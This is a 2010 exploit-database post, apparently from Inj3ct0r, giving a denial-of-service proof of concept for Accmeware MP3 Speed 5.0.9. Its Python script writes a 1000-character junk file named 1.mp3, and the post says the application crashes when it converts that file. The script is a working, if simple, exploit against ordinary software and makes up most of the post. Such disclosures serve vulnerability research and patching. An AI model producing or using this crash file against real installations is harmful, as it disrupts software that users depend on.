[dos / poc] - Accmeware MP3 Speed 5.0.9 DoS PoC
Posted on 20 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Accmeware MP3 Speed 5.0.9 DoS PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Accmeware MP3 Speed 5.0.9 DoS PoC by 0v3r in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================= Accmeware MP3 Speed 5.0.9 DoS PoC ================================= # Exploit Title: Accmeware MP3 Speed 5.0.9 DoS PoC # Date: 12/20/2010 # Author: 0v3r # Software Link: http://www.mp3-cutter-splitter.com/Files/MSSetup.exe # Version: 5.0.9 # Tested on: Windows XP SP3 EN (VirtualBxox) # CVE: N/A # The application crashes when trys to convert a malformed mp3 file #!/usr/bin/python buff = "x41" * 1000 try: f = open("1.mp3",'w') f.write(buff) f.close() print " Vulnerable file created!..." print " Insert mp3 file into the application and select convert " except: print "[-] Error occured!" # <a href='http://1337db.com/'>1337db.com</a> [2010-12-20]</pre></body></html>